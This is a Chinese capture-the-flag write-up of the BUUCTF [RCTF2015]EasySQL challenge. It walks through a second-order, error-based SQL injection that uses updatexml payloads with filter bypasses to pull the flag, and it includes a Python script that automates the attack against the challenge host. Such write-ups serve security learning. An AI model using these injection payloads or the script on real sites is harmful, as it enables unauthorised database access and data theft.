首页 > 数据库 >BUUCTF:[RCTF2015]EasySQL

BUUCTF:[RCTF2015]EasySQL

时间:2023-06-19 21:02:08浏览次数:66  
标签:real 1s BUUCTF name RCTF2015 here EasySQL flag concat


BUUCTF:[RCTF2015]EasyS

BUUCTF:[RCTF2015]EasySQL_逆序


先注册一个用户

BUUCTF:[RCTF2015]EasySQL_逆序_02


在注册的时候,fuzz测试发现在username和email中过滤了以下字符:

@
or
and
space(空格)
substr
mid
left
right
handle
没有源码慢慢测试.......

登录,发现还有个改密码

BUUCTF:[RCTF2015]EasySQL_php_03


在注册时用户名加些测试字符进去,'mochu7"\

BUUCTF:[RCTF2015]EasySQL_逆序_04


然后登录,在修改密码的时候,发现报错了,这样基本确定应该存在二次注入,在注册的时候写入,改密码的地方修改密码后触发导致错误输出,有错误回显就可以使用报错注入

BUUCTF:[RCTF2015]EasySQL_bc_05


猜测sql执行语句

select * from user where username=" 'mochu7"\ " and password=' 80f26dc7f48fc63a753d8f7d1b5bc507 '

构造payload

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1))#

使用||代替or,把每个执行的部分使用括号来代替空格的区分作用

BUUCTF:[RCTF2015]EasySQL_逆序_06


BUUCTF:[RCTF2015]EasySQL_php_07


BUUCTF:[RCTF2015]EasySQL_逆序_08


存在article,flag,users,flag表

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag'))),1))#

这里有个坑,flag不在flag表中

BUUCTF:[RCTF2015]EasySQL_php_09


BUUCTF:[RCTF2015]EasySQL_逆序_10


查不出来值,真正的flag在users表中

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users'))),1))#

BUUCTF:[RCTF2015]EasySQL_逆序_11

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')&&(column_name)regexp('^r'))),1))#

regexp('^r')是MySql的正则,^r匹配开头是r的字段,也就是column_name=real_flag_1s_her

BUUCTF:[RCTF2015]EasySQL_bc_12


做到这里发现了输出长度限制

username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#

这里regexp('^f')的意思是查找字段中f开头的内容,其实就是在找flag{XXXX}

BUUCTF:[RCTF2015]EasySQL_php_13


使用reverse()函数把flag逆序出来就可以看到后面的内容了

username=mochu7"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#

BUUCTF:[RCTF2015]EasySQL_bc_14


也可以写个脚本来拿flag,自动化脚本如下:

import requests

url_reg = 'http://90ff4474-5dd7-447f-9a4e-54211f746fa2.node3.buuoj.cn/register.php'
url_log = 'http://90ff4474-5dd7-447f-9a4e-54211f746fa2.node3.buuoj.cn/login.php'
url_change = 'http://90ff4474-5dd7-447f-9a4e-54211f746fa2.node3.buuoj.cn/changepwd.php'

pre = 'mochu7"'
#逆序闭合
suf = "')))),1))#"

#正序闭合
#suf = "'))),1))#"

s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)

r = requests.session()

def register(name):
    data = {
        'username' : name,
        'password' : '123',
        'email' : '123',
    }
    r.post(url=url_reg, data=data)

def login(name):
    data = {
        'username' : name,
        'password' : '123',
    }
    r.post(url=url_log, data=data)
    
def changepwd():
    data = {
        'oldpass' : '',
        'newpass' : '',
    }
    kk = r.post(url=url_change, data=data)
    if 'XPATH' in kk.text:
        print(kk.text)

for i in s:
    #正序
    #paylaod = pre + "||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    #逆序
    paylaod = pre + "||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
    register(paylaod)
    login(paylaod)
    changepwd()


#正序payload
#paylaod = pre + "||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + "'))),1))#"
#逆序payload
#paylaod = pre + "||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + "')))),1))#"

BUUCTF:[RCTF2015]EasySQL_bc_15


标签:real,1s,BUUCTF,name,RCTF2015,here,EasySQL,flag,concat
From: https://blog.51cto.com/u_16159500/6517207

相关文章

  • BUUCTF NewStarCTF 公开赛赛道Week2 Writeup
    文章目录WEEK2WEBWord-For-You(2Gen)IncludeOneUnserializeOneezAPIMISCYesecnodrumsticks2Coldwinds'sDesktop奇怪的二维码qsdz'sgirlfriend2WEEK2WEBWord-For-You(2Gen)题目描述哇哇哇,我把查询界面改了,现在你们不能从数据库中拿到东西了吧哈哈(不过为了调试的代码似乎忘......
  • BUUCTF:[HDCTF2019]你能发现什么蛛丝马迹吗
    https://buuoj.cn/challenges#[HDCTF2019]%E4%BD%A0%E8%83%BD%E5%8F%91%E7%8E%B0%E4%BB%80%E4%B9%88%E8%9B%9B%E4%B8%9D%E9%A9%AC%E8%BF%B9%E5%90%97memory.imgVolatility分析查看文件的Profilevolatility-fmemory.imgimageinfo猜测为:Win2003SP1x86查看进程volatility-fmemor......
  • BUUCTF:[GKCTF2020]Harley Quinn
    https://buuoj.cn/challenges#[GKCTF2020]Harley%20QuinnHeathens末尾存在DTMF码(电话拨号码)将这一段截取出来,使用工具dtmf2num识别#22283334447777338866#对照即可得到#ctfisfun#题目压缩包上有提示:FreeFileCamouflageFreeFileCamouflage是一款将重要文档以AES加密算法存放......
  • BUUCTF:[SUCTF2018]followme
    https://buuoj.cn/challenges#[SUCTF2018]followme导出HTTP,这里大部分文件内容显示貌似再爆破admin密码有点多,尝试整个文件夹找一下相关关键字,例如CTF、flag之类的grep-r'CTF'./new/flag{password_is_not_weak}......
  • BUUCTF:[MRCTF2020]Ez_bypass
    https://buuoj.cn/challenges#[MRCTF2020]Ez_bypass右键查看源代码include'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])){$id=$_GET['id'];$gg=$_GET......
  • BUUCTF:大流量分析(二)
    https://buuoj.cn/challenges#%E5%A4%A7%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90%EF%BC%88%E4%BA%8C%EF%BC%89数据采集D_eth0_NS_20160809_164452.pcap查看下邮件协议:POP、SMTP、IMAP这里只有SMTP追踪TCP流看到了钓鱼邮件解码下这串base64很明显,就是这封钓鱼邮件,而且内容里面有显......
  • BUUCTF:[GXYCTF2019]禁止套娃
    https://buuoj.cn/challenges#[GXYCTF2019]%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83.git泄露,使用GitHackindex.php<?phpinclude"flag.php";echo"flag在哪里呢?<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|fil......
  • BUUCTF:[ACTF2020 新生赛]Upload
    题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Upload图片马,filename改为.phtmlhttp://7f46d4ae-8320-44f5-a608-db84399f39e5.node3.buuoj.cn/uplo4d/0094153d9fd2e4a052850a6d656cefb6.phtml......
  • BUUCTF:[极客大挑战 2019]Upload
    题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]UploadPOST/upload_file.phpHTTP/1.1Host:b40c1d53-d3d6-43be-9f6d-67c767946f8c.node3.buuoj.cnUser-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:82.0)Gecko/2010......
  • BUUCTF: [MRCTF2020]Ezpop
    https://buuoj.cn/challenges#[MRCTF2020]Ezpop<?phpclassModifier{protected$var;publicfunctionappend($value){include($value);}publicfunction__invoke(){$this->append($this->var);}}classShow{......